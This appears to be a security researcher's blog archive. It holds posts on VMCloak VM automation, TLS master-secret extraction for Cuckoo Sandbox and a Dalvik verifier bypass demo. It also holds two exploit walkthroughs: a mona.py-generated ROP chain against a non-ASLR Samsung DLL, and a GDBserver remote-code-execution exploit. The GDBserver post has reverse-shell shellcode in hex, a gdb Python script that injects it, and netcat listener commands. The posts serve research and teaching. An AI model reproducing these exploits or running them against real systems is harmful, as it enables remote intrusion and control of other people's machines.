Revamped VMCloak 0.3

VMCloak 0.3: Totally revamped & Office support

[To quickly summarize - VMCloak is a tool for automatically creating, cloning,
and cloaking Virtual Machines to be used for Cuckoo Sandbox].

Earlier of this year I released VMCloak 0.2. Now the time has come
for the next release, 0.3. Most notable about this release is the revamped
command-line usage, the improvements with regards to installing dependencies
in the Virtual Machine, and the latest dependency, Office 2007. Thanks to
LookingGlass Cyber Solutions for supporting the development towards
this release including the Microsoft Office 2007 integration.

So what about it?

The new command-line interface feels a bit more hipster and less obtuse
compared to how its usage used to be. Most importantly, setting up a Virtual
Machine is no longer a one-shot action. Instead there are now a couple of
different subcommands, each to fulfill their own task.
In addition to that the new VMCloak version utilizes the new
Cuckoo Agent - it is less Cuckoo-specific and features more general
purpose uses, allowing easier communication between the VM and the various
VMCloak subcommands.

The subcommands.

As a few new commands are now available it does make sense to elaborate on
them a little bit. So here goes. Note that all commands can be ran either by
calling vmcloak-xyz or vmcloak xyz on the command-line.

vmcloak-init is the new command to initialize a new Virtual Machine. One
can specify a couple of flags, but the most important one is whether this is
going to be a Windows XP VM or a Windows 7 VM, and in the case of Windows 7
whether it will 32-bit or 64-bit (32-bit being the default).

So to get started we can run the following command to create a new 64-bit
Windows 7 VM. Note that this will be a VM internal to VMCloak - it can not
be used right away in Cuckoo. For Windows XP setups a serial key is also
required, on Windows 7 a serial key is optional (by default a dummy key
provided by Microsoft is used). And also, just like before you
still have to mount the Windows ISO file and setup vboxnet0.

# Install the latest vmcloak.
sudo pip install vmcloak --upgrade
# Mount the Windows 7 Installer ISO.
sudo mkdir -p /mnt/win7
sudo mount -o loop,ro win7.iso /mnt/win7
# Ensure the hostonly adapter is up.
vmcloak-vboxnet0
# Actually initialize the 64-bit Windows 7 VM.
vmcloak init --win7x64 seven0

Fast-forward 15 to 20 minutes Windows has now been installed in your VM, the
VM has been shutdown, and the VM has been removed from the VirtualBox
interface. All that remains is a VirtualBox harddisk file (.vdi file) in
~/.vmcloak/image and an entry about this new VM in VMCloaks new sqlite3
database.

Moving forward it is time to install a couple of software packages in the VM.
Using vmcloak-install we will now install all of the currently supported
dependencies. The first parameter represents the name of our VM followed by
all the dependencies that should be installed.

vmcloak install seven0 adobe9 wic pillow dotnet40 java7

Now to install Office 2007, assuming you have a valid ISO and serial key, one
can achieve to do so as follows. The ISO path and serial key have to be
provided as options to the dependency.

vmcloak install seven0 office2007 \
    office2007.isopath=/path/to/a.iso \
    office2007.serialkey=ABC-DEF

If required one can also easily do manual changes to VMCloak VMs now. By
calling vmcloak-modify with the VM name as only parameter it is possible
to change everything to your likings and simply by shutting the VM down, from
within Windows, the changes are made persistent. If you are running VMCloak
locally then the -vm-visible argument makes sense. For remote interaction
with the VM you should enable VRDE support on the VM and connect to it (e.g.,
through rdesktop -KPz ip:3389).

Finally there is the vmcloak-snapshot command which makes a snapshot of
your VM. There are a couple of options available for this command, but it is
mostly providing the name of the VMCloak VM, the name of the resulting VM as
it will be used by Cuckoo, and the static IP address to assign.

vmcloak snapshot seven0 cuckoo1 192.168.56.101

It is important to understand that after creating a snapshot of a VMCloak VM,
as one does by running the vmcloak-snapshot command on it, the VMCloak VM
becomes immutable. That is, you will no longer be able to run
vmcloak-install or vmcloak-modify on it. The reasoning behind this is to
save on valuable resources. Filling your harddisk is quite easy when you have
twenty Windows 7 VMs which each take up to 10GB.

If one decides he or she would like to update a VMCloak VM that is of course
still possible. For now the only way down that road is by cloning that
particular VMCloak VM. In the following example we clone seven0 to
seven0p1 (or, seven0 with one patch applied).

vmcloak clone seven0 seven0p1

I hope to have shed some light on the latest release. Going at it one step at
a time, life has just gotten slightly easier again.

Transparent MITM with Cuckoo Sandbox

Transparent MITM with Cuckoo Sandbox

In a series of upcoming blogposts I will be sharing a fair amount of cool
features that have been worked on over the past year in Cuckoo Sandbox. This
first blogpost features Man in the Middle support for Cuckoo Sandbox.

(For those that are familiar Cuckoo Sandbox and the general ideas behind MITM,
please scroll down to the slightly more exciting stuff in the Transparent
snooping of HTTPS traffic
paragraph).

So, man in the middle?

As we are well aware MITM is generally used to explain the process of snooping
on otherwise encrypted information, in this case network traffic. In this
blogpost we will dive into two different ways of doing MITM:

  • Providing a CA Root Certificate to allow a MITM proxy to intercept traffic.
  • Transparent dumping of TLS Master Secrets to decrypt TLS traffic.

Eh, Cuckoo Sandbox?

Before we continue onto the MITM stuff first a reminder on Cuckoo Sandbox. As
some of you will be familiar with, Cuckoo Sandbox is an Open Source
Automated Malware Analysis Sandbox. Analyses are performed by starting a VM
(Virtual Machine) and running the potentially malicious sample, or URL as we
will be exploring in this blogpost, inside the VM. Then stopping the VM once
the analysis is done.

Due to a personal interest, and that of some of my clients, Cuckoo has been
getting much, much better at analyzing Internet Explorer and alike in the past
few months. Both in actually analyzing it, but also due to developments
outside of the actual analysis, as will be outlined in this blogpost.
(For a part of the improvements on the analysis part I would like to thank
Brad Spengler for continuously providing feedback and bug fixes).

At work with mitmproxy

The first solution to provide MITM support to Cuckoo was to integrate a tool
called mitmproxy, created by Aldo Cortesi and maintained by fellow
The Honeynet Project member Maximilian Hils.

As outlined by the documentation mitmproxy works by
installing a CA Root Certificate on the target device, in this case a
VM running either Windows XP or Windows 7.

After Googling around and looking at GUI dialogs to import certificates into
the Windows Certificate store I finally managed to find an
easy command-line way to import a certificate (that only works on
Windows 7, not Windows XP). So basically invoking certutil.exe imports a .p12
certificate, this certificate can be found in ~/.mitmproxy after running
mitmproxy once (the first time mitmproxy is ran on a system it automatically
creates a unique set of certificates).

At this point there are two ways to throttle traffic from the VM into
mitmproxy. For the time being I have taken the easy way, which
involves explicitly routing traffic through a socks4/5 proxy, but this
approach has obvious disadvantages:

  • This technique is not compatible with Certificate Pinning.
  • Looking at the PCAP file all traffic goes to the proxy.
  • Having to explicitly tunnel traffic through socks4/5 translates into this
    technique not working for anything but Internet Explorer (i.e., at this
    point no support has been provided for other applications).
  • Hostnames are not resolved in the VM. Did I mention all the traffic goes to
    the proxy?

A better approach would be to route VM traffic to the proxy by the use of a
tool such as redsocks (not to be confused with RedSocks, a
Dutch startup and one of my clients, providing the malware threat defender, a
network security appliance for detecting malware infections and other unwanted
software in your corporate network).
Anyway, a possible drawback of such tool is the requirement of having to
configure it through various root commands, a requirement that generally is
not available to Cuckoo once it is running. I have to look into this later..
(And also this technique still requires the CA Root Certificate and thus it is
not compatible with Certificate Pinning).

Transparent snooping of HTTPS traffic

Going a bit more in-depth with HTTPS and TLS we learn
that in the TLS protocol the client and server exchange a per-session
random which, in combination with the master secret, can be
used to derive the encryption keys, MAC keys, and IVs (when needed) which in
turn allow one to fully decrypt the TLS stream.

Reading further we find where and how to intercept the PRF function by
Brendan Dolan-Gavitt, the developer of PANDA. We also find which
information is required to decrypt TLS streams in Wireshark.

Time to take a step back. So we require the RSA Session ID, which, as defined
in the TLS protocol, can be extracted from the Server Hello record.
We also require the Master Secret, which, as we have seen, can
be extracted from the PRF function call. By instrumenting the PRF function
call looking for calls which feature the “key expansion” string (as defined in
RFC 2246) we see that we can extract the master secret together with
the server random.

Long story short. If we extract each pair of server random and master
secret
from the PRF function in lsass.exe (Brendan outlined that all TLS
encryption is performed by the lsass.exe service on Windows, Windows 7 at
least), and if we extract Server Hello records from the PCAP file which
links the Session IDs to the server random, then
we can cross-reference this information to write the Master Secret file with
matching RSA Session ID and Master Secrets for each TLS session that was
negotiated during the analysis in the VM. (Note that to cross-reference we
extracted the server random in both scenarios, once from the Server Hello
record and once from the PRF “key expension” function call).

Fast forward various long nights debugging code, many changes and improvements
to Cuckoo to be able to facilitate all of this in the first place, and
matching the various pieces of extracted information to each other, we finally
conclude with functionality in Cuckoo to dump a tlsmaster.txt file for each
analysis.

To recap some facts about this transparent approach:

  • It does not require any special handling for the instrumented application,
    just to the instrumented lsass.exe service.
  • Cuckoo can decrypt any TLS/HTTPS stream that uses the Windows API to perform
    the TLS/HTTPS encryption. Including those of Windows Update, etc.
  • Since there is no need to proxy the traffic through some 3rd party tool, the
    PCAP file looks the same as it would without our transparent sniffer.
  • As nothing happens with the TLS itself, applications that use Certificate
    Pinning are supported.

Following a screenshot showing Wireshark with a PCAP containing decrypted
HTTPS traffic of an analysis going to the login page of the Dutch banking
website ING using the latest Cuckoo Sandbox:

Wireshark vs ING

HTTP/HTTPS replay tool

Because I was not really able to find such code elsewhere, and because tshark
falls under the not invented here rule, I worked up a small Python project
that extracts HTTP and HTTPS streams from a PCAP file with
according TLS Master Secrets file. To be fair, integrating a tool such as
tshark with a tool such as Cuckoo Sandbox is suboptimal, as naturally one of
the future goals is to include decrypted https traffic in the Cuckoo reports
without having to depend on tools like mitmproxy (due to the non-transparency
thing).

The final goal of httpreplay will, as one might expect, be to transparently
replay HTTP/HTTPS traffic from a PCAP file. At the moment this last step has
not been implemented yet, though. Aside other goals this can be used to
reproduce and unittest analysis of certain websites with Cuckoo Sandbox,
etc, etc.

Quickly running the httpreplay tool on the same PCAP as shown earlier we find
the following output (just URLs of extracted HTTP/HTTPS streams):

$ python httpreplay.py dump.pcap tlsmaster.txt
http://mijn.ing.nl/
https://mijn.ing.nl/internetbankieren/
https://mijn.ing.nl/favicon.ico
...

Some readers may note this tool is very similar to a thousand others in its
field, one of which being CapTipper, developed by our friends at
CheckPoint. At the moment the only added value of httpreplay would be https
support (and perhaps proper TCP reassembly and the future goal of being able
to operate multi-gigabyte files - in-memory loading and all that).

Conclusion

Knowledge about TLS was gained. Tools were reinvented. Cuckoo Sandbox gained
some new tricks. I finally wrote another blogpost ;)

VMCloak 0.2: Windows 7 Support

VMCloak 0.2: Windows 7 Support

A couple of months ago I released the first version of
VMCloak, now it’s time for version 0.2. VMCloak is a tool for
automatically creating and configuring Virtual Machines for
Cuckoo Sandbox.

What’s new?

In this version of VMCloak we introduce the long-awaited Windows 7
support. This means VMCloak can now automatically create and configure
Windows 7 virtual machines for Cuckoo Sandbox.

Usage

Those who have used VMCloak in the past will see that creating Windows 7
virtual machines is now just as easy as creating Windows XP virtual machines.
Creating a Windows 7 virtual machine goes as follows:

# Install the latest vmcloak.
sudo pip install vmcloak --upgrade
# Mount the Windows 7 Installer ISO.
sudo mkdir -p /mnt/win7
sudo mount -o loop,ro win7.iso /mnt/win7
# Ensure VirtualBox' hostonly adapter is up.
vmcloak-vboxnet0
# Create a Win7 VM with the name win7_0.
# This will take about 15 to 20 minutes.
vmcloak -r --win7x64 win7vm

Besides a couple of internal changes, the only thing that changed for Windows
XP support is that you’ll now have to specify -winxp when creating a
Windows XP virtual machine, for example:

vmcloak -r --winxp winxp0 --serial-key AAAAA..EEEEE

32-bit vs 64-bit

With Windows 7 in mind, it makes sense that VMCloak now supports both 32-bit
and 64-bit Windows 7 installations. This mostly means that VMCloak will
install a 64-bit version of the .NET framework, the 64-bit version of the
Microsoft C Runtime, etc.
For this to work, however, you’ll have to inform VMCloak that the 64-bit
libraries should be used instead of the 32-bit ones. This can either be
achieved by passing the -x64 flag to vmcloak, or by combining the
-win7 and -x64 flags straight into the -win7x64 flag.

(The upcoming version of Cuckoo Sandbox, version 1.3, will support
64-bit analysis!)

VMCloak Birds

For those who want to deploy multiple virtual machines in a relatively short
time window while preserving as many resources as possible might like
VMCloak’s bird feature.
VirtualBox has immutable disks, disks that are created once and then never
changed; any changes on top of the immutable disk are then written to a new
VirtualBox disk. VMCloak uses this to create a bird image - a fully
installed and configured Windows installation. Creating a Virtual Machine
ready to be used by Cuckoo Sandbox out of this bird image then consists of a
couple of steps:

  • Create a new Virtual Machine.
  • Attach the immutable bird image.
  • Boot into Windows.
  • Configure a unique static IP address for this VM.
  • Run Cuckoo and take a snapshot of the VM.

Naturally all these steps are handled by vmcloak-clone.

Bird images are crucial when running a Cuckoo Sandbox instance with more
than a handful of VMs on one machine. Whereas creating a new VM with Windows 7
installed, such as a bird image, takes about 15 minutes of time and almost
10gb of diskspace, creating a clone of a bird image takes less than a minute
and less than 1gb per clone.
Note that you’ll still need the bird image, also after cloning! (Basically
instead of installing Windows 7 10 times for 10 VMs, the bird image allows you
to install Windows 7 once and then re-use this installation).

Following is a quick guide to setting up 10 VMs using a VMCloak bird. Running
these commands should take up to half an hour to finish - just enough to go
for lunch.

# Create the 64-bit Windows 7 Bird.
vmcloak -r --win7x64 --bird win7bird
# Create 10 VMs.
for i in {0..9}; do
    vmcloak-clone -r --bird win7bird win7_$i
done

What’s next?

As always further cloaking the VMs is on the roadmap. If anyone has tricks &
tips on known detection vectors that would be useful for VMCloak, please do
let me know. E.g., registry keys containing known values specific to
virtualization software, etc.

Other than that, I’ve been working hard on 64-bit analysis for Cuckoo Sandbox
for a while now, so there’s that ;) And a bunch of other new and upcoming
features in Cuckoo.

Contact

For any questions or suggestions, please feel free to
reach out to me.

VMCloak: Automated Virtual Machine Generation and Cloaking for Cuckoo Sandbox

VMCloak: Automated Virtual Machine Generation and Cloaking

Today I present you a tool that I’ve been working on for a while,
vmcloak. For those of you familiar with Cuckoo Sandbox
and setting it up you’ll surely be aware of the pain that is configuring
virtual machines
.

VMCloak 101

Somewhat complete documentation can be found at readthedocs.org,
however, a quick introduction of the related commands is of course the
easiest. (Do note that VMCloak has mostly been tested on Ubuntu/Debian, so
other distributions might not work, yet.
)

Basically you need a few things to get started:

  • vmcloak (sudo pip install vmcloak)
  • Windows XP Installer ISO file
  • Windows XP Serial Key (that works with your installer!)
  • genisoimage & VirtualBox (sudo apt-get install genisoimage virtualbox)
  • Two directories for VirtualBox files.

First we have to mount the windows installer ISO file:

sudo mkdir -p /mnt/winxp
sudo mount -o loop,ro /path/to/your/winxp.iso /mnt/winxp

Now we have to start vboxnet0 if it has not already been started:

# If this returns nothing, then vboxnet0 hasn't
# been started.
VBoxManage list hostonlyifs
# Create vboxnet0 and assign the correct IP address.
VBoxManage hostonlyif create
VBoxManage hostonlyif ipconfig vboxnet0 --ip 192.168.56.1

And then two directories are required - a directory where VirtualBox’ snapshot
files will be stored, and a directory where the VirtualBox harddisk files and
installer ISO files will be stored. Note that you might want to place the
snapshot files in a tmpfs container to ensure VMs load pretty much
instantly.

mkdir ~/vms/ ~/vm-data/

Having setup the mount directory, the hostonly interface, and the VirtualBox
directories we’re now good to go with regards to creating our first VM with
VMCloak. It is recommended to use the recommended settings by providing
the -r switch. By default the hostonly IP address will be set to
192.168.56.101, however, if you intend to create multiple VMs then you’ll have
to give each VM a unique IP address (i.e., 192.168.56.102, 192.168.56.103,
etc.) In order to automatically register the newly created VM with Cuckoo
you’ll have to set the cuckoo directory so we’ll do this as well.

We’re now going to make a VM with the name cuckoo1 and the IP address
192.168.56.101:

vmcloak -r -d --vm-dir ~/vms/ --data-dir ~/vm-data/ \
    --iso-mount /mnt/winxp --serial-key AAAAA...EEEEE \
    --hostonly-ip 192.168.56.101 --cuckoo ~/cuckoo/ \
    cuckoo1

The -d switch causes vmcloak to spit out debugging messages which may be
helpful in some cases. This command will take up to 30 minutes to finish -
on the machines I’ve tested it’s usually less than or roughly 10 minutes.

So.. get yourself something to drink, wait for a bit, and you should have a
VM ready to be used by Cuckoo.

Allowing VMs full internet access

It is possible to give VMs full internet access, even after
creating them, without modifying the VMs themselves. If your network
configuration is “regular” (i.e., a working internet connection at either
eth0 or wlan0) then you’ll only have to run one command:

sudo vmcloak-iptables

TODO

Of course this is a never-ending project and it’s still actively being
developed ;) Things on the TODO list include, but are not limited to:

  • Windows 7 support
  • Further VM cloaking (making the VM as stealth as possible)
  • VMWare Workstation support
  • Support for installing Adobe / Microsoft Office / etc in the VM
  • Loads more..

Source

Of course there’s an official website and naturally the source code
can be found on github.

Credits

Further credits go to Thorsten Sick of Avira and a special thanks to
Avira and the iTES Project for supporting the development of
this tool.

So much for today! Hope the tool will be useful for people and if there are
any questions don’t hesitate to email me or so.

ps: Please don’t tell me about using vagrant or similar instead of
something custom built unless you’ve actually used it together with Cuckoo :P

Mona 101: a Global Samsung DLL

Mona 101: a Global Samsung DLL

This blogpost will be just another 101 for mona.py. There’s already a
good introduction to / full documentation of mona here, including
setting it up and running it for the first time. (Which is surprisingly easy,
at least with Immunity Debugger - I haven’t tested mona with WinDBG.)

Our target

Well, it turns out that a dll called WinCRT.dll, developed by Samsung and
distributed by default on at least a set of Samsung laptops, is
being loaded in every process that imports user32.dll on my system.. Yay!
Needless to say it doesn’t have ASLR enabled, nor does it rebase by default.
If you haven’t guessed its base address by now, then I’ll give you a hint;
0×10000000. A copy of the DLL can be found here - naturally I’m not
responsible for whatever you do with it :p

Btw, the path of this Samsung DLL is:
C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll

Generate some ROP

After running any program which imports user32, such as the following
MessageBox() program, we attach Immunity Debugger to it.

#include <windows.h>
int main()
{
    MessageBoxA(NULL, "Hello Samsung!", ":-)", 0);
}

We run the following command and get our ROP chain after roughly 10 seconds:

!mona rop -m wincrt -rva

As documented in the tutorials that were linked earlier in this blogpost, the
-m switch specifies the module to search, and -rva gives a dump with
relative addresses to the base address. (In case you need an infoleak to
obtain the base address of your target module, rather than having a DLL that’s
being loaded on a static address.)

The ROP chain returned may look like the following, including some comments
about what the registers should look like at the point that VirtualAlloc is
invoked.

"""
Register setup for VirtualAlloc() :
 EAX = NOP (0x90909090)
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()
 EDI = ROP NOP (RETN)
"""
def create_rop_chain(base_wincrt):
    # rop chain generated with mona.py
    rop_gadgets = [
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        base_wincrt + 0x0001f0a8,  # ptr to &VirtualAlloc() [IAT WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x00005bff,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN 0x08 [WinCRT.dll]
        base_wincrt + 0x0000431d,  # PUSH EAX # ADD AL,5F # POP ESI # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        base_wincrt + 0x0001a14e,  # POP EBP # RETN [WinCRT.dll]
        0x00000000,                # &  []
        base_wincrt + 0x0000bd5b,  # POP EBX # RETN [WinCRT.dll]
        0x00000001,                # 0x00000001-> ebx
        base_wincrt + 0x00005209,  # POP EBX # RETN [WinCRT.dll]
        0x00001000,                # 0x00001000-> edx
        base_wincrt + 0x0001183c,  # XOR EDX,EDX # RETN [WinCRT.dll]
        base_wincrt + 0x0001175e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [WinCRT.dll]
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x000191b8,  # POP ECX # RETN [WinCRT.dll]
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x41414141,                # Filler (RETN offset compensation)
        0x00000040,                # 0x00000040-> ecx
        base_wincrt + 0x0000f203,  # POP EDI # RETN [WinCRT.dll]
        base_wincrt + 0x0000f204,  # RETN (ROP NOP) [WinCRT.dll]
        base_wincrt + 0x0000f128,  # POP EAX # POP EBP # RETN [WinCRT.dll]
        0x90909090,                # nop
        0x41414141,                # Filler (compensate)
        base_wincrt + 0x0000c27e,  # PUSHAD # ADD AL,0 # RETN [WinCRT.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
# [WinCRT.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v0.0.0.1 (C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll)
base_wincrt = 0x10000000
rop_chain = create_rop_chain(base_wincrt)

Fixing the ROP chain

Unfortunately mona makes some small mistakes, but that’s why it gives great
feedback in the form of rop.txt and rop_suggestions.txt.

Now if you look closely at the generated ROP chain, while comparing them to
the notes about the required states of the registers for VirtualAlloc, then
you’ll notice that some gadgets have to be shuffled around, and some are not
correct yet.

Let’s analyze each register top-to-bottom from the provided register list in
order to see if they’re all set correctly. First we start with eax.

Eax is set to 0×90909090 at the end. However, it also sets ebp to an invalid
value - register dependencies is something that mona doesn’t handle very
well yet, unfortunately. Anyway, it’s easier to replace this gadget than to
shuffle it around. I ended up replacing it by a “pop ecx ; retn” and
“mov eax, ecx ; retn” gadget, and moving it to an earlier place in the ROP
chain where ecx has
not yet been assigned its final value. Ecx itself is already correct, it’ll be
set to 0×40 using the ‘original’ “pop ecx ; retn” gadget.

Edx has to become 0×1000, for which mona has decided to use ebx as
intermediate register. We can remove the first gadget that sets ebx, as its
value is overwritten right away when executing the next gadget. (Which sets
ebx as well.)

Now mona handles esp for us, so we don’t have to do anything there. The next
register, ebp, however, does need some extra work. The description tells us
it needs to point to a “jmp esp” gadget, but because there’s no such gadget in
our DLL mona sort of failed silently. (The comment doesn’t show an error
message, but instead shows something that doesn’t make much sense.)

Given there’s no “jmp esp” in our code, nor a direct “push esp ; retn” gadget,
we have to play around with mona some more.. We run the following command
which is, again, documented here, and find the following gadget.

!mona findwild -s "push esp#*#retn" -m wincrt
0x10009558: push esp # add al,2 # adc bl,al # xor eax,eax # retn [WinCRT.dll]

Finishing up

So yeah, that’ll do for us :) Patch the 0×00000000 value with
“base_wincrt + 0×00009558″ and ebp is good to go. Finally, esi and edi
have been handled correctly by mona. (Note that we don’t have to worry about
the value of eax in our custom “jmp esp” gadget, as this is executed right
after the call to VirtualAlloc, and literally jumps to our shellcode.)

Having fixed the ROP chain, our final ROP chain including some MessageBox()
shellcode, wrapped into a C file looks like the following. (Woah,
somebody added C dumping support to mona yesterday!) In case you’re interested
in the binary, to be ran when the DLL is loaded into memory, it can be found
here.

Conclusion

This was the first time I tried mona and I’m genuinely happy about it. Very
easy to use and it did the job for me :) Ah yeah, so anyone with this
particular Samsung software on his computer.. how do I even.. I guess it’s
just “another one of those”.

Turning arbitrary GDBserver sessions into RCE

Turning an arbitrary GDBserver sessions into RCE

Today we’ll see how we can turn an arbitrary GDBserver remote debugging
session into remote code execution. First of all, let’s assume gdbserver is
ran using the following command. We will also assume that the target
architecture is Linux/x86, but you can port the technique to other
architectures as needed.

$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary

What happens is that gdbserver will serve as many remote debugging sessions as
possible while it’s running. That is, we can have as many remote debugging
sessions as we like, until the gdbserver is killed (but only one at a time.)
This makes sense, because if we are debugging a target, then we don’t want to
restart gdbserver every time we hit “run” in gdb.

Let’s assume one were to run gdbserver in a screen, to prevent accidental
connection resets resulting in losing the gdbserver session (assuming we’re
ssh’ing into a remote server.) Exactly this happened to me - I recently found
out that there were still two (of my) gdbserver’s running in a screen from
when we were playing a CTF, almost two months ago.

Now anyone with the ip address and port number can attach to your gdbserver by
doing the following.

$ gdb
(gdb) target extended-remote host:port
Remote debugging using host:port
(gdb) run
[..]
[Inferior 1 (process 42) exited normally]

In order not to make the RCE not too easy, we’re going to assume that we don’t
have any symbols of the remote binaries, and that all addresses are ASLR’d. In
other words, educational guessing of “main” is useless, and we won’t be able
to do arbitrary function calls during debugging such as the following.

(gdb) call system("/bin/sh")
No symbol table is loaded.  Use the "file" command.

However, if we enter a breakpoint at an invalid address and run the debuggee,
we get an error right before executing the very first instruction of the
process. This looks roughly like the following :)

(gdb) break *0
Breakpoint 1 at 0x0
(gdb) run
Starting program:
warning: Could not load vsyscall page because no executable was specified
try using the "file" command first.
Warning:
Cannot insert breakpoint 1.
Error accessing memory address 0x0: Unknown error 18446744073709551615.
(gdb) info reg eip
eip            0xf7fe0850       0xf7fe0850

At this point the debuggee has been executed, and we’re able to inspect and
modify its state. We continue by removing our earlier breakpoint. Now it’s
time for the fun part.

Reverse Shell Shellcode

After a bit of googling, I stumbled upon the following shellcode. This
shellcode connects to an ip address and port of your choosing, and executes
/bin/sh with stdin, stdout, and stderr set to your socket. If we have netcat
listening on the remote ip address and port, then it’ll get a connection
request upon execution of the shellcode, and we can use it to run arbitrary
shell commands on the shellcodes machine, as if we had shell access. After an
initial test, this shellcode seemed to work on my x86_64 machine running a
32-bit application. However, there’s a small problem with this shellcode. If
we look closely at the shellcode, we notice the following.

804807b:   31 db        xor    ebx,ebx
804807d:   b3 02        mov    bl,0x2
[..]
804808a:   fe c3        inc    bl
[..]
8048098:   b1 03        mov    cl,0x3
804809a <dupfd>:
804809a:   fe c9        dec    cl
804809c:   b0 3f        mov    al,0x3f
804809e:   cd 80        int    0x80      ; system call
80480a0:   75 f8        jne    804809a

Investigating this system call further, we see that this is the dup2
system call
. However, the ebx register, or old_fd, seems to be
constant here - namely three. (I figured this out while brushing my teeth..)
This is the default fd if you open your first file descriptor in a program,
which is something we cannot assume, and is definitely not the case when
running the debuggee under gdbserver. (E.g., this shellcode fails if you open
a file or socket before running it, because the fd of the socket allocated by
our shellcode will be four for example, instead of three.)

If we look further, we see that the esi register contains the fd number
returned from the socket system call. (Actually, this is the socketcall
system call with SOCKOP_socket as operation, but that’s a minor detail
specific to Linux/x86.)

8048075:   cd 80        int    0x80      ; socket()
8048077:   89 c6        mov    esi,eax   ; esi = fd
[..]
804808e:   6a 10        push   0x10      ; sizeof(sockaddr_in)
8048090:   51           push   ecx       ; sockaddr_in *
8048091:   56           push   esi       ; fd
8048092:   89 e1        mov    ecx,esp
8048094:   cd 80        int    0x80      ; connect()

Long story short, we want to preserve esi before the connect system call,
and store it into ebx after the system call. Thus ebx will contain the fd of
our socket, and the system calls to dup2 will duplicate the correct fd into
stdin, stdout, and stderr. The following snippet shows the updates shellcode.
This is the shellcode that we’re going to use.

8048092:   89 e1        mov    ecx,esp
+                       push   esi       ; push fd
8048094:   cd 80        int    0x80      ; connect()
+                       pop    ebx       ; pop fd into ebx
8048096:   31 c9        xor    ecx,ecx
8048098:   b1 03        mov    cl,0x3

Running the Shellcode

All we have left to do is to patch the correct ip address and port into the
shellcode, namely that of our listening netcat instance (e.g., running
“nc -vvv -l 9001″ on your favourite linux box), overwriting eip with the
shellcode, and finally, running it.

For my exploit I’m using gdb’s Python bindings, as initially I had another
technique in mind, which required a bit more scripting. Following is the
final part of the code which generates the shellcode, overwrites it onto eip,
and executes it. We have two continue statements at the end, as the
shellcode will execv into /bin/sh, after which we’ll get an error that
gdbserver can’t read the memory of eip anymore, so we have to instruct
gdbserver to continue past that error.

def reverse_shell((ip, port)):
    """Modified x86 reverse shell"""
    ip, port = socket.inet_aton(ip), struct.pack('>H', port)
    sc = \
        '31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268' \
        '000000006668ffff6653fec389e16a10515689e156cd805b31c9b103fec9b03f' \
        'cd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80'
    return sc.decode('hex').replace('\xff'*2, port).replace('\x00'*4, ip)
for idx, ch in enumerate(reverse_shell(netcat)):
    gdb.execute('set *(unsigned char *)($eip + %d) = %d' % (idx, ord(ch)))
gdb.execute('continue')
gdb.execute('continue')

Final Exploit

The final exploit code can be found here.

Execution of the code may look like the following. We’ll need three shells.
(Optionally on different servers - do as you like.)

Shell 1

$ gdbserver --remote-debug 0.0.0.0:1337 ./some_unknown_binary
[..]

Shell 2

$ nc -vvv -l 31338
[..]

Shell 3

$ vim gdbservrce.py   # Patch the ip addresses
$ gdb -x gdbservrce.py
[..]

Enjoy Shell!

Now if we go back to Shell #2, we’ll see the following, and can run arbitrary
shell commands.

skier@box:~$ nc -vvv -l 31338
Connection from 1.1.1.1 port 31338 [tcp/*] accepted
id
uid=1010(skier) gid=1011(skier) groups=1011(skier)

Conclusion

This is a funny technique which basically tells you not to have gdbserver’s
running around :)

Dalvik Research

Dalvik Research

Over the past couple of months I’ve been doing some research with regards to
the Dalvik Virtual Machine, which is Android’s Java Virtual Machine
implementation. Long story short, most Android applications are written in
Java, which gets compiled to Dalvik Bytecode, and ends up in an APK file (a
Zip file.)

As part of my research on Dalvik, I analyzed both the Dalvik VM itself and
various applications - with a focus on their Obfuscation techniques (which
makes analysis harder.) This research was presented on a couple of
conferences.

Back in June I already posted my slides for my AthCon
talk, which focussed on Deobfuscation. Then a couple of weeks ago,
I did a similar talk together with Rodrigo Chiossi at
H2HC, featuring new and updated content, with a bit more focus on some
of the techniques involved in creating new Dex files.

Finally I did a talk yesterday at Hack.lu, focussing on the
Dalvik Virtual Machine itself. In this talk I presented about an
“undocumented feature” which I found in the way Android verifies Dex files,
allowing an attacker to run arbitrary Dalvik Bytecode (which is normally not
allowed - all code must normally be hardcoded and will be verified upon
installation.) Following are the slides and the
Proof of Concept DvmEscape application.

As explained during the presentation, when running this application on your
phone or emulator, you can type arbitrary Dalvik Bytecode and execute it by
clicking on the “Run Dalvik” button. On the 30th slide of the presentation one
can find two examples of valid Dalvik Bytecode, which, when ran, will return
with a fancy number. Unfortunately the dalvik.py disassembler mentioned in the
slides is currently not open source, but for some more documentation on the
Dalvik Bytecode there’s always the Dalvik Bytecode reference.

Win32 Calc.exe Proof of Concept

If you want to run my win32 calc.exe Proof of Concept from the presentation
you’ll have to do a couple of things:

  • Install CalcExe.apk on the device
  • Get the adb_type.py script, which “types” a string into
    the emulator
  • Finally, type payload.txt to the DvmEscape application, with
    the following command.

$ python adb_type.py $(cat payload.txt)
    

Note that typing the bytecode in to the emulator (or phone?!) takes roughly a
minute. (No, there appears to be no support for using the clipboard with the
emulator.) After that, just click on the button and calc should pop :)

For more information or questions, feel free to reach me at my new email
address; mail.

Dirkjan Email Feed

Dirkjan Strip Mailing List

This blogpost is mainly for Dutch (speaking) people (although I’ll
still keep the blogpost in English.) As I’m sure you’re all well-aware,
Dirkjan is an awesome Dutch comic.

A couple of weeks ago I stumbled upon the weekly feed from Veronica.
Naturally, not wanting to check the website every week, I came up with a very
simple Dirkjan Feed in the shape of a Mailing List. Of course this is not
